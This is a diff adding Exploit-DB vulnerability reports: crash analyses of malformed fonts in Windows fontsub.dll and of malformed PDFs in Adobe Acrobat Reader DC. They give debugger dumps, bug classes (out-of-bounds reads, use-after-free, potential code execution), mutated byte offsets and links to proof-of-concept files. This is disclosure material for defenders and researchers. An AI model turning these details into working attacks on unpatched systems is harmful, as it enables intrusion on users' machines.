+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47267.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47268.txt b/exploits/windows/dos/47268.txt
new file mode 100644
index 000000000..d89c22ac2
--- /dev/null
+++ b/exploits/windows/dos/47268.txt
@@ -0,0 +1,71 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!MakeFormat12MergedGlyphList:
+
+--- cut ---
+(48e4.50e0): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!MakeFormat12MergedGlyphList+0x176:
+00007fff`c086908a 458904ca        mov     dword ptr [r10+rcx*8],r8d ds:000001a4`4ebf1000=????????
+
+0:000> ? r10
+Evaluate expression: 1805184796672 = 000001a4`4d660800
+
+0:000> ? rcx
+Evaluate expression: 2826496 = 00000000`002b2100
+
+0:000> ? r8d
+Evaluate expression: 5 = 00000000`00000005
+
+0:000> dd r10
+000001a4`4d660800  00000000 00000000 00000020 00000003
+000001a4`4d660810  00000021 00000004 00000022 00000005
+000001a4`4d660820  00000023 00000006 00000024 00000007
+000001a4`4d660830  00000025 00000008 00000026 00000009
+000001a4`4d660840  00000027 0000000a 00000028 0000000b
+000001a4`4d660850  00000029 0000000c 0000002a 0000000d
+000001a4`4d660860  0000002b 0000000e 0000002c 0000000f
+000001a4`4d660870  0000002d 00000010 0000002e 00000011
+
+0:000> !heap -p -a r10
+    address 000001a44d660800 found in
+    _DPH_HEAP_ROOT @ 1a44c521000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             1a44c5255b0:      1a44d660800          1590800 -      1a44d660000          1592000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffc0869011 FONTSUB!MakeFormat12MergedGlyphList+0x00000000000000fd
+    00007fffc08691ee FONTSUB!MergeFormat12Cmap+0x000000000000011e
+    00007fffc08696f8 FONTSUB!MergeCmapTables+0x0000000000000444
+    00007fffc086b046 FONTSUB!MergeFonts+0x00000000000005a6
+    00007fffc086baac FONTSUB!MergeDeltaTTF+0x00000000000003ec
+    00007fffc08614b2 FONTSUB!MergeFontPackage+0x0000000000000132
+[...]
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 0000000c`1c7dd310 00007fff`c08691ee FONTSUB!MakeFormat12MergedGlyphList+0x176
+01 0000000c`1c7dd350 00007fff`c08696f8 FONTSUB!MergeFormat12Cmap+0x11e
+02 0000000c`1c7dd420 00007fff`c086b046 FONTSUB!MergeCmapTables+0x444
+03 0000000c`1c7dd500 00007fff`c086baac FONTSUB!MergeFonts+0x5a6
+04 0000000c`1c7dd6b0 00007fff`c08614b2 FONTSUB!MergeDeltaTTF+0x3ec
+05 0000000c`1c7dd7f0 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132
+[...]
+--- cut ---
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to execute arbitrary code in the context of the FontSub client process. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. Attached are 2 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47268.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47269.txt b/exploits/windows/dos/47269.txt
new file mode 100644
index 000000000..cdf47c00d
--- /dev/null
+++ b/exploits/windows/dos/47269.txt
@@ -0,0 +1,56 @@
+-----=====[ Background ]=====-----
+
+The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts.
+
+The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness.
+
+-----=====[ Description ]=====-----
+
+We have encountered the following crash in fontsub!FixSbitSubTableFormat1:
+
+--- cut ---
+(e38.4e58): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+FONTSUB!FixSbitSubTableFormat1+0x76:
+00007fff`c08717ce 438b0c1a        mov     ecx,dword ptr [r10+r11] ds:000001fa`7e952000=????????
+
+0:000> ? r10
+Evaluate expression: 64 = 00000000`00000040
+
+0:000> ? r11
+Evaluate expression: 2175377153984 = 000001fa`7e951fc0
+
+0:000> !heap -p -a r11
+    address 000001fa7e951fc0 found in
+    _DPH_HEAP_ROOT @ 1fa7e871000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             1fa7e873958:      1fa7e951fc0               40 -      1fa7e951000             2000
+    00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f
+    00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c
+    00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb
+    00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022
+    00007fffcca398f0 msvcrt!malloc+0x0000000000000070
+    00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012
+    00007fffc08723db FONTSUB!ModSbit+0x000000000000049b
+    00007fffc08670aa FONTSUB!CreateDeltaTTFEx+0x0000000000000612
+    00007fffc0866a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb
+    00007fffc086132a FONTSUB!CreateFontPackage+0x000000000000015a
+[...]
+ 
+0:000> k
+ # Child-SP          RetAddr           Call Site
+00 00000006`9dcfd2d0 00007fff`c0871b0e FONTSUB!FixSbitSubTableFormat1+0x76
+01 00000006`9dcfd310 00007fff`c0872460 FONTSUB!FixSbitSubTableArray+0x2aa
+02 00000006`9dcfd430 00007fff`c08670aa FONTSUB!ModSbit+0x520
+03 00000006`9dcfd570 00007fff`c0866a63 FONTSUB!CreateDeltaTTFEx+0x612
+04 00000006`9dcfd690 00007fff`c086132a FONTSUB!CreateDeltaTTF+0x2cb
+05 00000006`9dcfd7d0 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a
+[...]
+--- cut ---
+
+The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled. Attached are 3 proof of concept malformed font files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47269.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47270.txt b/exploits/windows/dos/47270.txt
new file mode 100644
index 000000000..0515b5392
--- /dev/null
+++ b/exploits/windows/dos/47270.txt
@@ -0,0 +1,102 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(180c.327c): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=27829020 ebx=1537d7d8 ecx=00000030 edx=00000001 esi=27828ff0 edi=1537d890
+eip=609ed114 esp=2ad6a1c0 ebp=2ad6a208 iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
+VCRUNTIME140!TrailingDownVec+0x1d4:
+609ed114 f30f6f4e10      movdqu  xmm1,xmmword ptr [esi+10h] ds:002b:27829000=????????????????????????????????
+
+0:014> kb
+ # ChildEBP RetAddr  Args to Child              
+00 2ad6a1c4 10dfaec3 1537d890 27828ff0 00000030 VCRUNTIME140!TrailingDownVec+0x1d4 [f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 635] 
+01 2ad6a208 10d737f2 153156b0 27828ff0 00000010 AGM!AGMGetVersion+0x74273
+02 2ad6a244 10d7522f 2ad6a27c 153156b0 27828ff0 AGM!AGMTerminate+0x14f42
+03 2ad6a290 0f5ab6b8 2ad6a2b4 153158b8 27828ff0 AGM!AGMTerminate+0x1697f
+04 2ad6a2b8 0f49861b 1b7a27f4 27828ff0 00000010 AcroRd32!AX_PDXlateToHostEx+0x1fd668
+05 2ad6a2f8 0f692cea 1b7a27f4 27828ff0 00000010 AcroRd32!AX_PDXlateToHostEx+0xea5cb
+06 2ad6a414 0f21a7d9 00000001 d497abe9 00000000 AcroRd32!AX_PDXlateToHostEx+0x2e4c9a
+07 2ad6a4c8 0f219928 2ad6a870 00000000 d497a735 AcroRd32!DllCanUnloadNow+0x181819
+08 2ad6a814 0f2198e6 2ad6a870 1b577188 d497a76d AcroRd32!DllCanUnloadNow+0x180968
+09 2ad6a84c 0f2197c1 2ad6a870 1b577188 2ad6a8dc AcroRd32!DllCanUnloadNow+0x180926
+0a 2ad6a8b8 0f218788 c0010000 000001bd 1b577188 AcroRd32!DllCanUnloadNow+0x180801
+0b 2ad6ad18 0f215cd7 2ad6b01c 0c3d578c c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
+0c 2ad6c4f8 0f215955 0c3d578c c0010000 000001bd AcroRd32!DllCanUnloadNow+0x17cd17
+0d 2ad6c5c8 0f1f93ed d497c989 1b577188 00000000 AcroRd32!DllCanUnloadNow+0x17c995
+0e 2ad6c6a8 0f270753 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+0f 2ad6c708 0f218184 00000000 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3
+10 2ad6dedc 0f215955 0c3d5708 c0010000 000001be AcroRd32!DllCanUnloadNow+0x17f1c4
+11 2ad6dfac 0f1f93ed d497efad 0c3c08a0 00000000 AcroRd32!DllCanUnloadNow+0x17c995
+12 2ad6e08c 0f270753 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+13 2ad6e0ec 0f218184 00000001 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3
+14 2ad6f8c0 0f215955 0c3d5684 c0010000 000001b2 AcroRd32!DllCanUnloadNow+0x17f1c4
+15 2ad6f990 0f1f93ed d497f551 00000000 1b79f458 AcroRd32!DllCanUnloadNow+0x17c995
+16 2ad6fa70 0f222848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+17 2ad6fac8 0f222647 00000000 00000000 0f2220d0 AcroRd32!DllCanUnloadNow+0x189888
+18 2ad6fb34 0f221fec d497f47d 0f221540 15ab5938 AcroRd32!DllCanUnloadNow+0x189687
+19 2ad6fb5c 0f221551 0d104ab8 0f221540 2ad6fb80 AcroRd32!DllCanUnloadNow+0x18902c
+1a 2ad6fb6c 73cf8674 15ab5938 73cf8650 e681ff4b AcroRd32!DllCanUnloadNow+0x188591
+1b 2ad6fb80 77285e17 15ab5938 c47e6da9 00000000 KERNEL32!BaseThreadInitThunk+0x24
+1c 2ad6fbc8 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f
+1d 2ad6fbd8 00000000 0f221540 15ab5938 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+0:014> !heap -p -a 27828ff0 
+    address 27828ff0 found in
+    _DPH_HEAP_ROOT @ c1a1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                28631e38:         27828ff0               10 -         27828000             2000
+          ? windows_storage!CStorageItemsDataFormat::SetFromStorageItemsArray<Windows::Foundation::Collections::IIterable<Windows::Storage::StorageFolder *>,<lambda_3b893a90b183593f6fe9d34608c3a173> >+b4
+    66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+    77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+    7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+    7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+    7725ccee ntdll!RtlAllocateHeap+0x0000003e
+    66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+    74a2f1f6 ucrtbase!_malloc_base+0x00000026
+    0f04fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
+    0f6933e4 AcroRd32!AX_PDXlateToHostEx+0x002e5394
+    0f692a25 AcroRd32!AX_PDXlateToHostEx+0x002e49d5
+    0f21a7d9 AcroRd32!DllCanUnloadNow+0x00181819
+    0f219928 AcroRd32!DllCanUnloadNow+0x00180968
+    0f2198e6 AcroRd32!DllCanUnloadNow+0x00180926
+    0f2197c1 AcroRd32!DllCanUnloadNow+0x00180801
+    0f218788 AcroRd32!DllCanUnloadNow+0x0017f7c8
+    0f215cd7 AcroRd32!DllCanUnloadNow+0x0017cd17
+    0f215955 AcroRd32!DllCanUnloadNow+0x0017c995
+    0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d
+    0f270753 AcroRd32!CTJPEGDecoderRelease+0x000358c3
+    0f218184 AcroRd32!DllCanUnloadNow+0x0017f1c4
+    0f215955 AcroRd32!DllCanUnloadNow+0x0017c995
+    0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d
+    0f270753 AcroRd32!CTJPEGDecoderRelease+0x000358c3
+    0f218184 AcroRd32!DllCanUnloadNow+0x0017f1c4
+    0f215955 AcroRd32!DllCanUnloadNow+0x0017c995
+    0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d
+    0f222848 AcroRd32!DllCanUnloadNow+0x00189888
+    0f222647 AcroRd32!DllCanUnloadNow+0x00189687
+    0f221fec AcroRd32!DllCanUnloadNow+0x0018902c
+    0f221551 AcroRd32!DllCanUnloadNow+0x00188591
+    73cf8674 KERNEL32!BaseThreadInitThunk+0x00000024
+    77285e17 ntdll!__RtlUserThreadStart+0x0000002f
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with the PageHeap option in Application Verifier enabled.
+
+- The crash occurs immediately after opening the PDF document.
+
+- The crash occurs inside of the memcpy() function while trying to read from out-of-bounds memory, and its arguments indicate that the program tries to copy 0x30 (48) bytes out of a 0x10-byte heap-based buffer. 
+
+- Attached samples: poc1.pdf (crashing file), poc2.pdf (crashing file), original.pdf (original file).
+
+- We have minimized the difference between the original and mutated files down to a single byte at offset 0x30b35f, changed from the original value of 0x11 to 0x10 (in the first sample) or to 0x15 (in the second sample). This byte appears to reside inside of a binary JP2K image stream.
+
+- We classify the bug as an information disclosure issue.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47270.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47271.txt b/exploits/windows/dos/47271.txt
new file mode 100644
index 000000000..bddbe3e1a
--- /dev/null
+++ b/exploits/windows/dos/47271.txt
@@ -0,0 +1,144 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(2040.5034): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=14080e48 ebx=00000000 ecx=148d9d48 edx=00000000 esi=0ec19d20 edi=f0f0f0f0
+eip=0f29f04f esp=050faa10 ebp=050faa34 iopl=0         nv up ei ng nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210286
+AcroRd32!AX_PDXlateToHostEx+0x340fff:
+0f29f04f 8b4754          mov     eax,dword ptr [edi+54h] ds:002b:f0f0f144=????????
+
+0:000> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 050faa34 0f29ff1b 16daf6c0 00000001 16a94648 AcroRd32!AX_PDXlateToHostEx+0x340fff
+01 050faa50 0f29524b 1812da54 050faa98 0edcafa6 AcroRd32!AX_PDXlateToHostEx+0x341ecb
+02 050faa5c 0edcafa6 1812da54 050faefc 16a94648 AcroRd32!AX_PDXlateToHostEx+0x3371fb
+03 050faa98 0edca5b8 c0010000 00000008 16a94648 AcroRd32!DllCanUnloadNow+0x181fe6
+04 050fab54 0edc9928 050faefc 00000000 a705d59c AcroRd32!DllCanUnloadNow+0x1815f8
+05 050faea0 0edc98e6 050faefc 1840e4d8 a705d5e4 AcroRd32!DllCanUnloadNow+0x180968
+06 050faed8 0edc97c1 050faefc 1840e4d8 050faf68 AcroRd32!DllCanUnloadNow+0x180926
+07 050faf44 0edc8788 c0010000 00000008 1840e4d8 AcroRd32!DllCanUnloadNow+0x180801
+08 050fb3a4 0edc5cd7 050fb6a8 14b5884c c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8
+09 050fcb84 0edc5955 14b5884c c0010000 00000008 AcroRd32!DllCanUnloadNow+0x17cd17
+0a 050fcc54 0eda93ed a705b608 1840e4d8 00000000 AcroRd32!DllCanUnloadNow+0x17c995
+0b 050fcd34 0ee20753 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+0c 050fcd94 0edc8184 00000000 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3
+0d 050fe568 0edc5955 14b587c8 c0010000 00000006 AcroRd32!DllCanUnloadNow+0x17f1c4
+0e 050fe638 0eda93ed a7059c24 16a6e638 00000000 AcroRd32!DllCanUnloadNow+0x17c995
+0f 050fe718 0eda81e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d
+10 050fe764 0ed9b383 16a6e638 00000001 00000000 AcroRd32!DllCanUnloadNow+0x15f228
+11 050fe8d8 0ed9ac97 18084704 00000001 175d4f70 AcroRd32!DllCanUnloadNow+0x1523c3
+12 050fe940 0ed98590 a70592fc 21abd808 0c1d0a28 AcroRd32!DllCanUnloadNow+0x151cd7
+13 050fe9c0 0ed9825a 175d4f70 18f82c10 0c1d0a38 AcroRd32!DllCanUnloadNow+0x14f5d0
+14 050fe9fc 0ed98192 175d4f70 18f82c10 0c1d0a38 AcroRd32!DllCanUnloadNow+0x14f29a
+15 050fea84 0ed9750e 175d4f70 18f82c10 050fecb8 AcroRd32!DllCanUnloadNow+0x14f1d2
+16 050feac0 0ed96122 175d4f70 18f82c10 050fecb8 AcroRd32!DllCanUnloadNow+0x14e54e
+17 050fed84 0ed95168 175d4f70 050fee18 050fee68 AcroRd32!DllCanUnloadNow+0x14d162
+18 050fee88 0ed94375 175d4f70 050fefb8 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8
+19 050fefdc 0ed934ba 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5
+1a 050ff03c 0ed9334d 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa
+1b 050ff05c 0ed91f3c 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14a38d
+1c 050ff114 0ed91962 00000001 00000000 a7058a50 AcroRd32!DllCanUnloadNow+0x148f7c
+1d 050ff16c 0ed9177a 181d3680 00000001 a7058aec AcroRd32!DllCanUnloadNow+0x1489a2
+1e 050ff1d0 0ed914ff 050ff2c4 a70589d8 18eb9920 AcroRd32!DllCanUnloadNow+0x1487ba
+1f 050ff2e4 0ec566ec 18eb9920 0ec56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f
+20 050ff2fc 0ec5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c
+21 050ff318 7460e0bb 00300dd4 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f
+22 050ff344 74618849 0ec563a0 00300dd4 0000000f USER32!_InternalCallWinProc+0x2b
+23 050ff368 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20
+24 050ff438 74608503 0ec563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be
+25 050ff4a0 74608aa0 0d749a40 00000000 0000000f USER32!DispatchClientMessage+0x1b3
+26 050ff4e8 77291a6d 050ff504 00000020 050ff568 USER32!__fnDWORD+0x50
+27 050ff520 76e92d3c 746091ee 050ff5b8 ba389ade ntdll!KiUserCallbackDispatcher+0x4d
+28 050ff524 746091ee 050ff5b8 ba389ade 0cfaf370 win32u!NtUserDispatchMessage+0xc
+29 050ff578 74608c20 bf376fa6 050ff59c 0ec6da8b USER32!DispatchMessageWorker+0x5be
+2a 050ff584 0ec6da8b 050ff5b8 0cfaf370 0cfaf370 USER32!DispatchMessageW+0x10
+2b 050ff59c 0ec6d81e 050ff5b8 a7058d2c 0cfaf370 AcroRd32!DllCanUnloadNow+0x24acb
+2c 050ff610 0ec6d6b4 a7058d74 0cfaf370 00000000 AcroRd32!DllCanUnloadNow+0x2485e
+2d 050ff648 0ebfc556 a7058d84 0cf98070 00000000 AcroRd32!DllCanUnloadNow+0x246f4
+2e 050ff6b8 0ebfbf81 0ebd0000 00af0000 0cf98070 AcroRd32!AcroWinMainSandbox+0x756
+2f 050ffad8 00af783d 0ebd0000 00af0000 0cf98070 AcroRd32!AcroWinMainSandbox+0x181
+30 050ffea4 00bffd2a 00af0000 00000000 0c112f0a AcroRd32_exe+0x783d
+31 050ffef0 73cf8674 04ecb000 73cf8650 40982fa7 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a
+32 050fff04 77285e17 04ecb000 393e3559 00000000 KERNEL32!BaseThreadInitThunk+0x24
+33 050fff4c 77285de7 ffffffff 772aad8c 00000000 ntdll!__RtlUserThreadStart+0x2f
+34 050fff5c 00000000 00af1390 04ecb000 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+0:000> u eip-7
+AcroRd32!AX_PDXlateToHostEx+0x340ff8:
+0f29f048 8b7804          mov     edi,dword ptr [eax+4]
+0f29f04b 85ff            test    edi,edi
+0f29f04d 7441            je      AcroRd32!AX_PDXlateToHostEx+0x341040 (0f29f090)
+0f29f04f 8b4754          mov     eax,dword ptr [edi+54h]
+0f29f052 8945e8          mov     dword ptr [ebp-18h],eax
+0f29f055 8b4738          mov     eax,dword ptr [edi+38h]
+0f29f058 85c0            test    eax,eax
+0f29f05a 741c            je      AcroRd32!AX_PDXlateToHostEx+0x341028 (0f29f078)
+
+0:000> dd eax
+14080e48  f0f0f0f0 f0f0f0f0 a0a0a0a0 a0a0a0a0
+14080e58  00000000 00000000 d3b8376a 101b7bae
+14080e68  abcdaaa9 8bfc1000 00000028 00000050
+14080e78  00000002 16fdf310 0b043584 dcbaaaa9
+14080e88  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
+14080e98  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
+14080ea8  f0f0f0f0 f0f0f0f0 a0a0a0a0 a0a0a0a0
+14080eb8  00000000 00000000 d4b8376d 101b7baa
+
+0:000> !heap -p -a eax
+    address 14080e48 found in
+    _HEAP @ c110000
+      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
+        14080e20 0008 0000  [00]   14080e48    00008 - (free DelayedFree)
+        66d6c396 verifier!AVrfpDphNormalHeapFree+0x000000b6
+        66d6ab43 verifier!AVrfDebugPageHeapFree+0x000000e3
+        77305359 ntdll!RtlDebugFreeHeap+0x0000003c
+        7725ad86 ntdll!RtlpFreeHeap+0x000000d6
+        7725ac3d ntdll!RtlFreeHeap+0x000007cd
+        66e5aad0 vrfcore!VfCoreRtlFreeHeap+0x00000020
+        74a2db1b ucrtbase!_free_base+0x0000001b
+        74a2dae8 ucrtbase!free+0x00000018
+        ec02849 AcroRd32!AcroWinMainSandbox+0x00006a49
+        1a0e8706 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000286
+        1a0d0e0a JP2KLib!JP2KCopyRect+0x0000bc0a
+        1a0e7904 JP2KLib!JP2KImageInitDecoderEx+0x00000024
+        f29f8e8 AcroRd32!AX_PDXlateToHostEx+0x00341898
+        f2a1508 AcroRd32!AX_PDXlateToHostEx+0x003434b8
+        f29522b AcroRd32!AX_PDXlateToHostEx+0x003371db
+        f29f164 AcroRd32!AX_PDXlateToHostEx+0x00341114
+        edcaf85 AcroRd32!DllCanUnloadNow+0x00181fc5
+        edca5b8 AcroRd32!DllCanUnloadNow+0x001815f8
+        edc9928 AcroRd32!DllCanUnloadNow+0x00180968
+        edc98e6 AcroRd32!DllCanUnloadNow+0x00180926
+        edc97c1 AcroRd32!DllCanUnloadNow+0x00180801
+        edc8788 AcroRd32!DllCanUnloadNow+0x0017f7c8
+        edc5cd7 AcroRd32!DllCanUnloadNow+0x0017cd17
+        edc5955 AcroRd32!DllCanUnloadNow+0x0017c995
+        eda93ed AcroRd32!DllCanUnloadNow+0x0016042d
+        ee20753 AcroRd32!CTJPEGDecoderRelease+0x000358c3
+        edc8184 AcroRd32!DllCanUnloadNow+0x0017f1c4
+        edc5955 AcroRd32!DllCanUnloadNow+0x0017c995
+        eda93ed AcroRd32!DllCanUnloadNow+0x0016042d
+        eda81e8 AcroRd32!DllCanUnloadNow+0x0015f228
+        ed9b383 AcroRd32!DllCanUnloadNow+0x001523c3
+        ed9ac97 AcroRd32!DllCanUnloadNow+0x00151cd7
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10. Reproduces most cleanly with Light PageHeap enabled in Application Verifier for the AcroRd32.exe process (which fills freed allocations with 0xf0f0f0...). Without PageHeap, the crash typically occurs in ntdll!RtlReportCriticalFailure.
+
+- The crash occurs immediately after opening the PDF document. It is a use-after-free condition which subsequently leads to memory corruption.
+
+- Attached samples: poc1.pdf and poc2.pdf (crashing files), original1.pdf and original2.pdf (corresponding original files).
+
+- We have minimized the differences between the original and mutated files down to 2 bytes inside of binary JP2 image streams. For poc1.pdf, the modifications are at offsets 0x290a and 0x298b; for poc2.pdf, at offsets 0x5b4 and 0x62a.
+
+- We classify the bug as a potential RCE.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47271.zip
\ No newline at end of file
diff --git a/exploits/windows/dos/47272.txt b/exploits/windows/dos/47272.txt
new file mode 100644
index 000000000..e7978efb1
--- /dev/null
+++ b/exploits/windows/dos/47272.txt
@@ -0,0 +1,49 @@
+We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file:
+
+--- cut ---
+(36ec.3210): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=fffff987 ebx=f8519200 ecx=290cc000 edx=290c8fbc esi=28f43098 edi=fffff851
+eip=645412f9 esp=1390d9e4 ebp=00000014 iopl=0         nv up ei ng nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
+AGM!AGMInitialize+0x584c9:
+645412f9 8911            mov     dword ptr [ecx],edx  ds:002b:290cc000=????????
+
+0:023> !heap -p -a ecx-8
+    address 290cbff8 found in
+    _DPH_HEAP_ROOT @ bc51000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                 bc53d9c:         28c10090           4bbf70 -         28c10000           4bd000
+    66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240
+    77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c
+    7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6
+    7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7
+    7725ccee ntdll!RtlAllocateHeap+0x0000003e
+    66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f
+    74a2f1f6 ucrtbase!_malloc_base+0x00000026
+    0e75fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9
+    64531c72 AGM!AGMInitialize+0x00048e42
+ 
+0:023> kb
+ # ChildEBP RetAddr  Args to Child              
+WARNING: Stack unwind information not available. Following frames may be wrong.
+00 1390da28 77240a31 07bb5958 64540190 1390daac AGM!AGMInitialize+0x584c9
+01 1390da9c 74a2f1f6 f238e0c0 07bb5958 0dc0fc40 ntdll!RtlCaptureStackBackTrace+0x41
+02 1390dab8 0e75fcd9 004bbf70 0e75fcc0 6451f0bd ucrtbase!_malloc_base+0x26
+03 1390db54 6451e588 12b91f98 0000047b 00000001 AcroRd32!AcroWinMainSandbox+0x3ed9
+04 1390db58 12b91f98 0000047b 00000001 00000000 AGM!AGMInitialize+0x35758
+05 1390db5c 00000000 00000001 00000000 17191e14 0x12b91f98
+--- cut ---
+
+Notes:
+
+- Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled. Without PageHeap, the crash may also be triggered in ntdll!RtlReportCriticalFailure, if the system allocator detects a corrupted chunk.
+
